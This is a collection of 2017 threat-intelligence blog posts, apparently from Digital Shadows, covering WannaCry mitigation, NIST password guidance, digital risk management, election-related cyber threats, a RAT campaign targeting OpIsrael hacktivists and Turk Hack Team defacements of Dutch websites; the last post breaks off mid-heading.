    Trust and be Trusted

    We trust our people to make the right decisions and assume best intentions. We deal in facts, not fear.

    All about the People

    We have a diverse, inclusive, fun and spirited culture that nurtures exceptional talent for the long haul. We make the world safe for our clients and our community.

    5 Lessons from WannaCry: Preventing Attacks with Security Engineering Tue, 16 May 2017 19:18:12 +0000 With the recent news storm concerning the “WannaCry” ransomware worm, a great deal of mitigation advice has been provided. This advice typically centers around patching, in particular installing MS17-010 from Microsoft (or the KB from Microsoft for XP/2k3), which patches the vulnerability exploited by the ETERNALBLUE exploit used by WannaCry.

    WannaCry Note

    Much has been made about the (in)ability for certain organizations to patch, but we felt it would be worthwhile revisiting our favorite Security Engineering principles and seeing how then can be used to protect against WannaCry. While the focus of this blog will be on protection, I’ll be writing another blog post on detection.

    Here are five fundamental and widely used Security Engineering principles, which are all reusable across different types of attackers:

    1. Default deny

    This principle can be expressed as “only provide access where it has been explicitly granted, otherwise deny”. This is a useful principle to apply to firewalling and other techniques for managing traffic flow such as IP whitelisting. By denying SMB traffic (TCP port 445) at the organization’s perimeter, WannaCry’s spreading technique is prevented. Often this principle is not strictly applied to internal systems.

    WannaCry was typically able to move laterally within an organization as endpoints (user workstations) were able to communicate with each other. While this may be required in specific situations, the general case is that an endpoint only needs to communicate with specific servers (such as the Domain Controller, networking equipment, fileservers, etc.) but not with other workstations. Appropriately configured host-based firewalls would prevent WannaCry being able to move laterally.

    2. Least Privilege

    Jerome Salzer formulated this principle as; “Every program and every privileged user of the system should operate using the least amount of privilege necessary to complete the job”. This principle is typically applied to defeating Privilege Escalation exploitation, however, we find this principle to be a natural complement to the first principle. An appropriately segmented network provides only the privilege necessary for the hosts to do their work. If workstations do not need access to other networks, especially operational or production networks, then this privilege should not be granted.

    This approach would prevent WannaCry from spreading beyond the network segment it gained access to. This principle also applies to documents, do all systems need read and write access to important data, or only read access? By limiting such privileges, the ability of WannaCry to encrypt/”lock” files is reduced.

    3. (Attack) Surface Reduction

    Any feature of a piece of software that is enabled increases the attack surface of that software. There is simply more for an attacker to target. In the case of WannaCry, it is reliant on SMB v1 being enabled on a host. SMB v1 is a legacy protocol and is highly recommended by Microsoft to be disabled, if not explicitly required.

    By going through the process of discovering which protocols or features are explicitly required for a system to function and disabling all other, unnecessary features, a system is hardened against attack. The ETERNALBLUE exploit will fail if SMB v1 is not enabled, rendering the worm unable to gain a foothold. Another excellent way to reduce the attack surface of a piece of software is to apply vendor patches which resolve security vulnerabilities. Patching Windows prevents ETERNALBLUE from being able to successfully exploit a host.

    4. Need to Know/Compartmentalization

    Need to know is typically used to describe data classification systems but it has utility beyond those systems to a general approach to configuring systems. In the case of WannaCry, important data can be safeguarded by only granting access to those who have a business requirement to access that data, that is, a need to know. This reduces the number systems that have access to important data and therefore makes the defender’s lives easier as they have fewer systems to be directly concerned about. If important data can be accessed by many systems, any one system that is compromised by WannaCry would be able to encrypt the data.

    5. Defense in Depth

    This principle is an overarching one that encompasses the four others. In essence, it states that not one single control is sufficient to adequately protect a system. Controls can be physical (like door locks), technical (like encryption) or administrative (like security policies). By using the four above principles together, we can derive a defense-in-depth strategy for protecting against WannaCry that is reusable against other attacks too:

    • Firewall off SMB traffic both in-bound and out-bound from an organization’s network (#1)
    • Aggressively filter BYOD devices or assets with missing (security) patches from accessing resources in the network (#1)
    • Restrict workstation-to-workstation communication to only that which is necessary (#2)
    •  Segment networks so that compromise of one endpoint does not automatically give access to the entire network (#2)
    • Disable unneeded legacy features which are liable to be exploited (#3)
    • Applying vendor patches in a timely fashion to reduce the number of exploitable vulnerabilities in installed software as part of a continuous vulnerability assessment program (#3)
    • Restrict access to important data to only those who are required to have it. Read/write access should only be granted where there is an explicit business requirement (#4)

    Defense-in-depth would also indicate that we should be prepared if our other controls fail so it would be natural to add a final guideline:

    • Backup important data to guard against critical loss and failure of other controls (#5)

    These five fundamental steps can help organizations to better prevent attacks like the WannaCry. Prevention is only one step, so stay tuned for our upcoming blog with advice on improving detection.

    WannaCry: The Early 2000s Called, They Want Their Worms Back Fri, 12 May 2017 22:56:10 +0000 Earlier today it was revealed that the United Kingdom’s National Health Service was targeted by ransomware known as “WannaCry.” Sixteen NHS organizations were impacted by the attack, and victims have spread across the globe and will likely continue to do so. WannaCry takes advantage of SMB vulnerabilities in Windows, using the ETERNALBLUE exploit which was publicly released by the ShadowBrokers in April. This SMB vulnerability is “wormable” and reminiscent of the early 2000s worms like Code Red, Nimda and Blaster. Microsoft released MS17-010 to address this SMB vulnerability on March 14th prior to the ShadowBrokers dump.

     ms17 010

    Just over eight weeks later, we are seeing the initial implications of not deploying this SMB patch, and this is an area that I’d like to focus on. If you have been on the Twitters today, it is as if a million voices have suddenly cried out in terror tweeting “Why didn’t you just patch it!” This seems like a reasonable question, but reality isn’t always reasonable. Having been an industry analyst, I’m naturally familiar with ivory towers and questions like this can indicate that someone might be a bit disconnected from the realities of day to day security operations. There are legitimate reasons why not every endpoint on the planet is running MS17-010.

    • Patching ain’t easy; managing a global patch/systems/configuration management program is complex.
    • Devices and users are transient.
    • Environments are very heterogeneous. How many organizations have a single workstation build? It’s more like you have many gold images.
    • It simply isn’t possible to patch all the things: medical equipment, research gear, ICS devices, you know the drill.

    Am I making excuses for organizations that didn’t apply MS17-010? No I am not, but it is important to remember that security isn’t black and white, operations are hard, and sometimes thoughtful risk management might still result in a loss. Back to WannaCry, here are some recommendations from our intelligence team on mitigations:

    • Apply MS17-010 if you can
    • In the event you can’t:
      • Restrict access on TCP and UDP ports 138, 139 and 445 to the host.
      • Disable SMBv1
      • Disable RDP (TCP/UDP port 3389) access from the Internet. (I really hope you don’t have public facing RDP exposed).
      • If that is also not possible, restrict access either via a VPN or IP access control lists.

    Two final recommendations, if you don’t already have a ransomware response playbook, hopefully today isn’t the test run. You should also formalize your ransomware minimization strategy; you might not be able to prevent it all, but it doesn’t mean you shouldn’t try. Our intelligence team will continue to monitor the situation and update our clients as needed.

    Authentication Nation: 5 Ways NIST is Changing How We Think About Passwords Tue, 09 May 2017 16:47:16 +0000 Passwords have taken a beating over the past several years, and there seems to be little question among leading practitioners that the antiquated method of authentication needs a hefty remodel. To give an idea of scale, we assessed the biggest 1,000 organizations in world and found that, across over 30,000 different breaches, 97% of these organizations had leaked corporate emails online. This should serve as a cautionary tale for all organizations to carefully examine their own password management practices. Following Microsoft’s updated password recommendations, the US National Institute for Standards and Technology (NIST) has recently come out with its own updated password guidelines.

    NIST Password Guidelines

    When two major security industry influencers  come to such similar conclusions, it’s a strong signal that companies should take a hard look at their password policies – both for their internal systems and their externally-facing services that have an identity store.

    Many of the NIST guidelines are recommendations only, but a number of them are requirements that all federal government agencies must follow. That’s a broad reach of influence – but it’s even wider than that, because many corporate security professionals use them as base standards and best practices when forming policies for their companies in the private sector. Here is a quick overview of main changes the NIST has proposed:

    1. Minimum password length of 8 characters, with a maximum of no less than 64. The focus here is to fortify the system so it can manage the storage of these longer and more complex passwords, thus the burden lies with the verifier easing password fatigue on users and simplifying processes.
    2. All ASCII and UNICODE characters should be allowed. Remembering a password longer than eight characters is not necessarily easy, but NIST’s new guidelines allow the use of all printable ASCII characters, as well as all UNICODE characters (including emojis!) to improve usability and increase variety.
    3. Remove knowledge-based authentication and no more password hints. NIST is rejecting knowledge-based authentication (KBA) that can be discovered, or brute forced, by an attacker. In other words, the typical “first pet” or “mother’s maiden name” password prompt is a thing of the past.
    4. Stop practice of regular password expiration. If we want users to comply and choose long, hard-to-guess passwords, we shouldn’t make them change those passwords unnecessarily. The only time passwords should be reset is when they are forgotten, if they have been phished, or if you think (or know) that your password database has been stolen and could therefore be subjected to an offline brute-force attack.
    5. Check against a list of “known-bad” passwords. NIST’s experts say a mix of character types in passwords (such as at least one digit, uppercase letter and symbol) “is not nearly as significant as initially thought, although the impact on usability and memorability is severe.”Instead, NIST recommends that user-chosen passwords be compared against a list of unacceptable passwords. That list should include passwords from previous breaches, dictionary words and specific words (such as the name of the service itself) that users are likely to choose.

    Many enterprises and online services are looking to replace the much-scorned password. Several financial service companies, for example, are rolling out biometric authentication options for their customers, as well as a myriad of two-factor authentication options. However, there’s still no universally accepted alternative to the password. So, despite its weaknesses, both in terms of security and practical use, many systems rely on it, and since passwords are here to stay for a while longer, it’s refreshing to see research by NIST looking at how to make password authentication more robust and more user-friendly.

    Although the NIST Digital Authentication Guideline governs Federal sites, its tenets are good standards for any site or system with authentication requirements. Overall, the new guidelines put the user experience at the forefront while also establishing robust efforts into system fortification and authentication methods. Credentials are incredibly valuable to attackers, who use them for a range of activities, including post-breach extortion, phishing and account takeovers. As organizations begin to better understand the implications of breaches, NIST is a great resource for guidance on passwords.

    The 3 Pillars of Digital Risk Management: Part 3 – The Top 5 Main Risks of Reputational Damage Thu, 27 Apr 2017 17:40:46 +0000 In this 3-part blog series, we discuss how each of the 3 pillars, Cyber Threat, Data Leakage, and Reputational Damage, contributes to Digital Risk Management. In part 2, we discussed the 6 main areas that contribute to data leakage risks. In this next and final blog in the series, we discuss the main risks of reputational damage.

    It is easy for organizations to be unaware of how their brands are being used online and what impact this can have on customers and employees. Here are the top 5 main risks of reputational damage.

    1. Phishing

    Phishing campaigns are conducted against organizations. Using digital risk management to identify campaigns, raises security awareness and mitigates the campaign’s impact.

    2. Domain Infringement

    Typosquat domains are registered to spoof your websites to hijack your brand. By monitoring for typosquatted domains, organizations can protect their reputation and minimize the implications of domain infringements.

    Molnnet Typosquat 

    Figure 1: A view of typosquatting domains identified for a fictional organization

    3. Spoofed Profiles

    The social media accounts of key executives or brands can be spoofed. Unwary consumers might mistake these unsanctioned accounts as legitimate and get incorrect information or, worse, succumb to social engineering attacks.

    4. Brand Defamation

    Disgruntled former employees or dissatisfied customers can damage brands online. Swift detection of online brand defamation helps to keep customers happy and prevents damage occurring to the organization’s brand.

    Molnnet Defamation 

    Figure 2: A defamatory blog set up by a former company employee 

    5. Mobile Application Issues

    Spoofed or maliciously modified applications can leave customers and employees exposed. Organizations need to identify and remove these risky mobile applications to have confidence that their employees’ and customers’ information is protected.

    A failure to detect and remediate these reputational damage risks to customers and employees can have significant business impacts. including loss of revenue, regulatory costs and loss of customers.

    Thanks for reading along with this blog series on digital risk management. To learn more, check out our web page on Digital Risk Management.


    Top 5 Causes of Reputational Damage from Cyber Threats from Digital Shadows

    The Usual Suspects: Understanding the Nuances of Actors’ Motivations and Capabilities Fri, 21 Apr 2017 16:53:27 +0000 When it comes to their adversaries, organizations can still fall into the trap of focusing on the ‘usual suspects’. At times, the mainstream media’s coverage of threat actors can result in a highly polarized or stereotyped lens in which actors are unfortunately presented as either highly sophisticated, well-funded state actors; or far less sophisticated hackers who occasionally get a break, aka “400-pound hackers.”

    The reality is more nuanced, with actors exhibiting a range of different motivations, intent, capability as well as technical skill sets and operational sophistications which are not mutually exclusive. Some highly technical attackers using customized malware and achieving persistent access to networks have also made simple operational errors which have provided valuable clues to investigators.

    Of course, as Rick Holland wrote in a previous blog, “adversaries do what works easily”. This has been best put by the 2013 Verizon DBIR “Would you fire a guided missile at an unlocked screen door?”. It’s not all about zero days; high capability attackers have also leveraged commercial off the shelf tools and common malware to accomplish their mission.

    In a similar way, less technically capable threat actors can be highly successfully using simple techniques. Threat actor group Team GhostShell showed evidence of this by using database query tactic SQL injection to successfully gain access to hundreds of public records of alumni from 53 universities across the world.

    Digital Shadows maintains a comprehensive intelligence database encompassing a wide range of threat actors and campaigns. Within each profile, motivations and intent of an actor are analyzed and assessed to create a rich understanding of the characteristics of an actor as well as the tactics they typically adopt.

     DS Portal Intel View

    Figure 1 Digital Shadows Portal – Intelligence View

    This well-referenced and ready-made library of threat actor activity provides a resource clients can use to understand the latest threats or to provide detail for intelligence assessments. Clients are also presented with actor profiles most relevant to their organizations. The profiles can also be used as case studies for more strategic assessments looking at a range of actors or sector threats.

    For example, from the first identification of an attack, an organization can use the Intelligence tab of the Portal to begin piecing together the perpetrator, their TPPs, recent activity, and credibility, in order to make an assessment of how to move forward.  In addition, known indicators of compromise (IOCs) are included allowing clients to recognize any intrusion attempts on their internal systems.

     DS Portal Actor Profile

    Figure 2 Actor Profile

    This allows our clients to maintain an understanding of the complex assortment of threat actors out there, including an understanding of their capabilities and intent towards particular targets.  Organizations can then inform their security posture and help manage their risk to achieve business goals.  Finally, organizations can use these threat actor and campaign profiles to manage up the chain of command. SearchLight customers can leverage this robust library to quickly tell a story to their executive team and help them understand the actor’s implications to their business.

    To learn more about how Digital Shadows monitors threat actors, watch our full demo video here.

    Liberté, égalité, securité: 4 Threats to the French Presidential Election Thu, 20 Apr 2017 16:43:59 +0000 French citizens will take to the polls on April 23rd to vote for a new president. If, as expected, no candidate wins a majority, then a run-off election between the two top candidates will be held on May 7th. Since reports of network intrusions against political parties during the 2016 United States presidential election surfaced last year, it has become customary that any analysis of an upcoming western political election forewarns of the threat of foreign nation-state interference.

    In the French case, intelligence sources claimed in January that Kremlin-backed actors were conducting an influence campaign in favor of Marine Le Pen of the Front National, while discrediting her competitors, particularly the pro-EU and centrist candidate Emmanuel Macron. Macron’s camp have pointed to media reports from Russian news outlets as examples of “fake news”. They have also claimed to have been subjected to numerous cyberattacks against their campaign systems, though these remain unconfirmed.

    Sputnik Elections

    Figure 1: Sputnik article referred to by Macron camp as “fake news” [Source: Sputnik]

    Although we have yet to detect any confirmed examples of cyberattacks (or influence operations?) associated with the French election, we can look back at activity seen during previous elections – particularly those in the United States and Netherlands – as useful indicators for the type of activity we can expect.

    1. Network intrusions

    Actors may choose to target political parties or government organizations in similar ways to the reported network intrusions against the Democratic party in the United States. Moreover, large financial bodies may be targeted given their pivotal role in the French economy and, by extension, any future policy decisions by the French president, particularly in light of the uncertainty surrounding France’s membership in the European Union.

    Network intrusions would likely be conducted for intelligence-gathering purposes, potentially with a view to releasing sensitive information public as part of an influence operation designed to discredit a political candidate. Based on previous examples of network intrusions we have observed; social engineering and spear-phishing continue to be the most successful vectors of attacks – a trend that was assessed as highly unlikely to change for the foreseeable future.

    2. Public data leakage

    An ideologically motivated actor may attempt to release sensitive or confidential information citing freedom of information and the fulfilment of a public service. Obtaining information for the purposes of public data leakage can be achieved in a variety of ways, including phishing and social engineering attempts, network intrusions and data exfiltration, inadvertent exposure through public facing databases and applications, or even document theft from insiders.

    In Feb 2017, it was reported that WikiLeaks founder Julian Assange had claimed to be in possession of information that could potentially damage the election prospects of Emmanuel Macron. Assange claimed the information had been obtained from the cache of emails belonging to Hillary Clinton. It was not known whether WikiLeaks planned to release this information, though this was assessed as likely given Assange’s public overtures.

    3. Hacktivism

    Hacktivist actors are most often motivated by of public attention, either for themselves or the issues they claim to represent. Hacktivist attacks generally take the form of DoS attempts, website defacements and public data leaks achieved through techniques such as SQL injection. In addition to this, other forms of tactics included “tweet storms” (a method whereby tweets from multiple Twitter accounts sympathetic to an ideology would direct messages at certain targets, or attempt to start a trend on social media platforms) and other attempts to raise awareness to a cause on social media. At the time of writing we did not detect any hacktivist campaigns established specifically for the 2017 French elections.

    4. False media reporting

    The dissemination of false information might allow threat actors to influence public opinion or discredit a particular candidate. Such activity would likely occur across a wide variety of media including established online publications, spoof news sites, or through fake social media profiles on LinkedIn, Facebook and Twitter. The South American hacker Andrés Sepúlveda, for example, was reportedly responsible for a series of covert influence campaigns across elections in Latin America. Sepúlveda and his team purportedly managed thousands of fake profiles on social media to shape the discussion around political topics and even hack the cell phones and emails of candidates.

    On 02 Mar 2017, the Belgian newspaper Le Soir claimed it had been the victim of plagiarism after an impersonation of its website published an article alleging that Saudi Arabia was financing Emmanuel Macron’s campaign. The false article claimed to be a dispatch from Agence France-Presse, appearing on the domain lesoir[.]info, a typo-squat of the legitimate lesoir[.]be.

     False Le Soir Elections

    Figure 2: False Le Soir article retweeted by Marion Le Pen, member of Front National, official Twitter account [Source: CrossCheck]

    While it remains to be seen if many of the above scenarios materialize, the threat of increased cyber activity during election periods is one that organizations with ties to government or political institutions will have to consider for the foreseeable future. As such, organizations can help protect themselves through several methods.

    1. For starters, adequate phishing training can help mitigate against cases of network intrusion and public data leaks, as social engineering and phishing attempts were assessed to be the most likely, though not the only, vectors of attack.
    2. Properly securing public facing applications, monitoring for suspicious activity that may be indicative of a company insider threat, identifying instances of fake or spoofed social media profiles, and tracking the emergence of hacktivist actors and dedicated campaigns.
    The 3 Pillars of Digital Risk Management: Part 2 – The 6 Main Areas That Contribute to Data Leakage Risks Tue, 18 Apr 2017 17:06:13 +0000 In this 3-part blog series, we discuss how each of the 3 pillars, Cyber Threat, Data Leakage, and Reputational Damage, contributes to Digital Risk Management. In part 1, we discussed how understanding cyber threats requires a threat intelligence capability and consists of 4 main areas. In this next blog, we discuss the main areas that contribute to data leakage risks.

    Leaked information can provide valuable clues for adversaries. Below are 6 main areas that contribute to data leakage risks.

    1. Sensitive Code

    Sensitive code and private encryption keys that are publicly available on code-sharing sites. This can allow attackers to better tailor their attacks to an organization.

    2. Credential Compromise

    Employee credentials are exposed in third-party breaches. These credentials are then used by attackers for account takeovers, spam lists, credential stuffing, spear-phishing and post-breach extortion.

    crackingforum sentry 

    Figure 1: A criminal forum discussing various configurations for SentryMBA, a credential stuffing tool

    3. Private and Confidential Documents

    Sensitively marked documents are inadvertently leaked out by partners and employees. As well as opening up organizations for corporate espionage, it also allows attackers to weaponize legitimate-looking documents and launch targeted attacks.

    4. Intellectual Property

    Intellectual property is freely available and shared online, inadvertently and by malicious actors. This can leave organizations vulnerable to corporate espionage. But if an organization is aware that a new design, for example, has been leaked early, they can get it removed and mitigate accordingly.

    5. Social Media Over-Sharing

    Employees reveal information about security procedures, software and hardware. This information can be used by attackers as they perform reconnaissance on an organization, seeking out specific software to exploit.

    Oversharing social media 

    Figure 2: A company tweet that inadvertently shares the company wifi password

    6. Personally Identifiable Information (PII)

    Organizations and their supply chain may be inadvertently exposing customer PII. This information can have a compliance impact, given the recent EU General Data Protection Regulation (GDPR).

    This information leaves organizations vulnerable to corporate espionage and competitive intelligence. Worse still, criminals and hostile groups can exploit this leaked data to find the organization’s weak points and launch targeted cyber-attacks. By monitoring for this leakage, organizations can gain an awareness of where they are exposed and remediate.

    To learn more, check out our web page on digital risk management, or check out our 1 pager below.


    The 5 Main Areas that Contribute to Data Leakage Risks from Digital Shadows

    The 3 Pillars of Digital Risk Management: Part 1 Understanding Cyber Threats Thu, 13 Apr 2017 16:24:28 +0000 What is Digital Risk Management?

    The National Institute of Standards and Technology (NIST) defines the field of risk management as: “The process of identifying risk, assessing risk, and taking steps to reduce risk to an acceptable level.”6 Applied to cyber security, we can define the field of external digital risk management as:

    “The process of identifying, assessing, and taking steps to reduce external digital risk to an acceptable level. External digital risk management considers: 1) cyber threats 2) data leakage and 3) reputation risks.”

    In this 3-part blog series, we will discuss how each of these pillars contributes to Digital Risk Management. Let’s begin with Cyber Threat.

    The concept of “threat” can refer to a range of things; it may be an action, threat actor or new tool. Here are the main four areas we define:

    1. Indications and warnings

    Leverage threat intelligence to get advance information regarding an adversary’s planned activities. This can include being named on a hacktivist target list or being discussed on a known criminal forum.

    OpIcarus Target list

    Figure 1: A target list posed as part of OpIcarus’ Phase 4

     2. Actor profiles

    Profile actors’ tactics, techniques, and procedures (TTPs) in order to better understand how an attacker might target you and what tools they are likely to use. This can be used to stack up an organization’s defenses to the threats they are likely to face.

    Turk Hack Team Profile

    Figure 2: A profile of the threat actor “Turk Hack Team

    3. Campaign profiles

    Understand the threat actor’s tools, target geographies and target industries. This can include the examination of malcode or the analysis of a new phase in a hacktivist campaign. This allows organizations to be better prepared for developing threats.

    4. Emerging tools

    Track new tools being developed and shared on the dark web and criminal forums. This can include the inclusion of new CVEs in an exploit kit, which can help to prioritize patching procedures.

    Blaze EK

    Figure 3: The release of Blaze Exploit Kit alongside the claimed vulnerabilities it exploits

    The value of threat intelligence is directionally proportional to how tailored it is to an organization. For external digital risk management to be effective, a threat intelligence doctrine should be applied. In applying the intelligence doctrine to the concept of cyber threat, organizations can methodically understand what they care about, create collection plans, identify collection gaps and ultimately deliver tailored intelligence.

    To learn more, check out our 1 pager below or check out our Digital Risk Management web page.

    To get the latest in digital risk management, subscribe to our digital risk management emails here.


    Understanding Cyber Threats: 4 Key Areas from Digital Shadows

    All Sources Are Not the Same; Why Diversity Is Good for Intelligence Tue, 11 Apr 2017 16:19:21 +0000 As we all know, if you listen to just one side of the story, very often you don’t get the full picture. As any parent will know, you sometimes get truths, half-truths and sometimes even outright lies. A discerning guardian, however, will be able to piece all these disparate bits of information together, work out which ones don’t make sense and which ones do before taking action.

    This is true of intelligence analysis also – relying on single sources, or placing too much emphasis on one source may lead to biased or inaccurate assessments. Take for example, some of the numerous headlines of “Jihadi” involvement that emerged following the TalkTalk data breach in October 2015 that apparently emerged after the event following a single Pastebin post of unknown provenance. The reality of the episode, now a matter of public record, is somewhat different and resulted in a 17-year-old boy admitting hacking offenses in November last year, claiming he was “just showing off” to friends.

    While some single-source reporting is sufficient to meet a narrowly defined tactical need, in-depth intelligence analysis that seek to address more complex operational or strategic intelligence requirements required fused intelligence from multiple and diverse sources. At Digital Shadows, the foundation of our in-depth intelligence is the collection and analysis from multiple sources followed by a peer review cycle from a diverse team. This helps us identify and mitigate common analytical pitfalls such as confirmation bias, groupthink, cognitive dissonance and cultural misapprehensions.

    Drawing from multiple sources allows intelligence analysts to maximize the strengths and minimize weaknesses of different intelligence disciplines, as well as challenge or corroborate findings. Just as children lie to their parents, threat actors regularly seek to subvert the truth as a core aspect of their operations. Hacktivists exaggerate their capability and impact, criminals scam fellow criminals and state actors lay false trails to confuse investigators – in plain terms: lying is the norm.

    Digital Shadows analysts also use Structured Analytical Techniques such as the Strengths Weaknesses Opportunities and Target analysis, paired comparison or the Analyses of Competing Hypotheses (see Figure 1)  in an attempt to remove bias and focus on the evidence at hand.

    Tesco ACH 

    Figure 1: An example of an ACH produced by Digital Shadows, read more here

    Part of the intelligence analyst’s job is to tease apart disparate sources, evaluate their reliability based on previous reporting and understand the quality of the information that they provide. At Digital Shadows, as part of our service, we provide customers with intelligence products that incorporate multi-source intelligence, from open-sources, the deep and dark web, social media and technical intelligence. We do this to ensure the rigour of our products and challenge information that we acquire from other sources.

    Monitoring the Mobile Threat Landscape Tue, 04 Apr 2017 16:28:36 +0000 The UK’s National Cyber Security Centre (NCSC) and the National Crime Agency (NCA) released a joint paper on the cyber threats to UK businesses on March 14th. This paper can be seen as an authoritative voice with regards to the “state of the nation” and cyber threats to UK corporations.


    While much of the media response to the paper focused on one part of the document which discussed threats from ransomware and connected devices, another section of the paper examined the emerging threat from malicious mobile applications. The paper assessed that at the time of writing, while there had been no reported cases of mobile malware being used in an attack to pivot into a corporate enterprise network, it is a growing threat and overall attacks involving mobile malware have increased in volume and sophistication. The increasing speed, power, and storage capabilities of mobile devices means they are used more frequently for activities previously conducted on other platforms, such as laptops or PCs. Mobile devices are considered to be highly lucrative and viable targets to threat actors.

    Three prominent trends were identified in the cyber threat report:

    • Malicious applications which distribute malware, often request elevated privileges and permissions in order to conduct further infections. The types of malware detected to date have included information stealers and ransomware. In January 2017 a ransomware variant called Charger was identified bundled together with an information stealer masquerading as a battery saving app available for download from the Google Play store. The app has since been removed from the store.
    • Fake applications which mimic brands and trick users in to downloading the malicious version. These were involved in stealing personal or confidential information such as credentials. A trojan downloader was identified masquerading as an Adobe Flash Player app targeting all Android operating systems in February 2017, seeking to infect users with banking malware, seeking to steal customers’ login credentials.
    • SMS phishing (aka SMishing), uses the same techniques as traditional phishing attacks to persuade the user into disclosing personal information, download a file or app, or visit a malicious site. Various bank and retail customers have been targeted in SMishing attacks, often involving an alert to customer warning of suspicious activity on their account and requesting confirmation of their credentials, or offering access to exclusive vouchers and discount codes. Successful attacks resulted in the compromise of customers’ personal and financial information.

    In recognition of the growing nature of mobile threats, Digital Shadows has recently extended its SearchLight digital risk management service to focus on Mobile Application Monitoring. The wide range of threats detected includes:

    • Suspect application behavior and code, such as self-signed certificates or the presence of malware;
    • Versions of an application that have been modified by a third party;
    • Copies of application on stores that are not actively managed;
    • Impersonations or spoof applications that mimic brands and affiliate links that mislead or confuse users.

    By identifying these threats, organizations can protect themselves from potential theft of intellectual property, mitigate against brand misuse and prevent subsequent reputational damage. Organizations without mobile applications or use of SMS communication are still considered to be at risk of threat actors developing malicious and illegitimate applications, or targeting their customers with SMishing attacks.

    To mitigate this threat it’s important to improve education around mobile applications risks. This includes the risk of purchasing from third-party stores, downloading cracked versions of applications, and granting requests for intrusive permissions and privileges all increase risks to end users. Organizations should ensure that operating systems are up to date, helping to prevent against the exploitation of vulnerabilities by threat actors.

    Mobile devices and applications have been described as the “new battleground” in digital risk and security. Therefore, all mobile users should benefit from knowing what threats are lurking over the horizon.

    OpIsrael Hacktivists Targeted By Unknown Threat Actor Thu, 30 Mar 2017 12:33:37 +0000 Ideologically-motivated “hacktivist” actors can present a variety of threats to organizations from defacements, to denial of service attacks and sometimes even data compromise. Our analysts recently observed hacktivist actors themselves being targeted with malware.

    We recently identified evidence indicative of a malware distribution campaign apparently intended to deploy remote access trojans (RAT) onto the machines of hacktivist actors engaged in supporting the 2017 iteration of OpIsrael. This yearly hacktivist campaign targets Israeli entities on April 7th. While monitoring for activity relating to OpIsrael, Digital Shadows identified a Twitter account sharing links to what were claimed to be two denial of service (DoS) tools – one for Windows and one for Android devices. The tweets encouraged users to download these tools in order to participate in OpIsrael and featured multiple hashtags used by this campaign, as well as Anonymous collective imagery.

    OpIsrael Tool Tweet

    Figure 1 – Tweet linking to purported “DDoS tools”. Details obfuscated for safety.

    The Android app file (APK) for the purported Android tool was hosted on the file sharing site Sendspace, but the Windows tool was hosted on a page on what appeared to be a compromised website. This page featured further incitements to participate in OpIsrael and claimed to have been posted by Anonymous RedCult, an Anonymous affiliated group which on March 3, 2017 posted a video to YouTube declaring the intention to target Israeli Government sites in support of OpIsrael.

    OpIsrael Tool Download

    Figure 2 – Purported “DDoS” tool download page.

    Hacktivists seeking to whip up support for an upcoming operation will often share tools to be used by prospective supporters. Digital Shadows observed similar posts while tracking OpIcarus, an operation targeting financial institutions throughout 2016.

    However, in this case all was not as it seemed. When we downloaded and examined the files, we discovered that the purported Windows DoS tool was highly likely a version of the well-known Dark Comet RAT. Similarly, the claimed Android DoS tool was highly likely an Android RAT which, after being installed, elevated its permissions to obtain access to the infected device’s camera, SMS messages, microphone, browser, call logs and physical location via GPS. At the time of analysis, neither of these samples had previously been documented on malware analysis sites.

    Assessment and outlook

    These findings suggest that the actors responsible for these tweets have sought to use Anonymous collective imagery and hashtags to socially engineer supporters of OpIsrael to compromise their machines. While the nature and objectives of the actor(s) responsible for this campaign are not known, opposing pro-Israel campaigns such as OpIslam, often emerge to counter OpIsrael.

    Therefore while it is possible that this distribution campaign was the work of an opportunistic criminal actor, we also assessed it to be plausible that it was part of an attempt by pro-Israeli actors to compromise the machines of OpIsrael participants. If this is the case, it would indicate the possibility that the actors responsible for this distribution campaign might use it to act against OpIsrael participants prior to April 7th. It remains to be seen whether evidence of such targeting will emerge.

    Turk Hack Team and the “Netherlands Operation” Wed, 29 Mar 2017 10:03:48 +0000 Since mid-March, Turk Hack Team have been participating in a new campaign called “Netherlands Operation”, announced via their official Twitter feed. This account also published claims of 252 Dutch-based websites defacement, alongside alleged screenshots of the defaced websites.

    Netherlands Operation Figure 1 Image tweeted from the Twitter account associated with Turk Hack Team:  Translation: Turk Hack Team presents…Netherlands Operation. All Turk Hack Team members are invited…

    Turk Hack Team have previously targeted websites and groups whom they judge to have disrespected or otherwise slighted the state of Turkey since 2013. The group consists of a group of patriotic hackers who most often engage in website defacement. The majority of the group’s activity is in the Turkish language, and previous attacks indicate a strong bias towards supporting the Turkish state and Turkey’s controversial president Recep Tayyip Erdoğan. Most notably, the group claimed credit for a distributed denial of service (DDoS) attack against the US Library of Congress in July 2016 motivated by a perception that the US government had a role to play in the instigation of an attempted coup.

    Since the announcement of the campaign, Digital Shadows have detected indications that at least 2,700 websites had been defaced with messages from the group including the terms “TurkHackTeam Netherlands operation” (see Figure 2, for examples of search engine listings showing defacement messages on several websites). Most of the affected websites used the Dutch and German top level domain. In addition to the website defacements, Digital Shadows also found claims of data dumps for other Dutch websites, including healthcare and government entities, among others. A dedicated forum for the group also contained posts related to the campaign.

     Turk Hack Team Defacements

    Figure 2 Examples of defacement messages

    Turk Hack Team is not the only group actively targeting Dutch-based entities. On March 13, 2017, several Dutch and English-language media outlets reported that “hundreds” of websites had been defaced by the threat group “PrivateHackers”. In these instances, the actors reportedly compromised two servers owned by Netherlands-based hosting company Versio, allowing defacement messages to be placed on websites hosted on those servers. It remains unknown, however, how Turk Hack Team was able to gain access to the over 2,700 Dutch websites.

    Ongoing Geopolitics between Turkey and the Netherlands

    Many of the defacements made by Turk Hack Team carry nationalist messages and criticize the Netherlands for recent political actions affecting Turkish ministers. As highlighted in the timeline below, tensions have risen between the two countries over the last three months, but the source of the issue can be traced back to the failed Turkish coup attempt in July 2016.

    Following the coup attempt, Turkish President Recep Tayyip Erdogan pushed for an expansion of his executive powers. On January 9, 2017, the Turkish parliament passed a bill calling for a constitutional referendum to be voted on by the public to give the president these expanded powers. Since then, support for a ‘yes’ vote has been spread across Turkey via the Erdogan government. Erdogan’s efforts have expanded beyond Turkey’s borders and he has attempted to garner favor with Turkish expatriates in Europe. Citing security reasons, officials in Germany blocked Turkish ministers from entering several German towns between February 27 and March 3, 2017. On March 11, a Turkish minister was blocked from entering Rotterdam in the Netherlands. Both incidents prompted responses from Erdogan, who claimed Germany was using “Nazi practices” and threatened that the Netherlands would “pay the price” for blocking the minster. These events have apparently catalyzed the hacktivist response amongst patriotic groups (see Figure 3 for a timeline of significant events).

    Turkey Netherlands Timeline

    Figure 3 Timeline of geopolitical escalation and hacktivist activities in 2017

    Referendum vote approaches

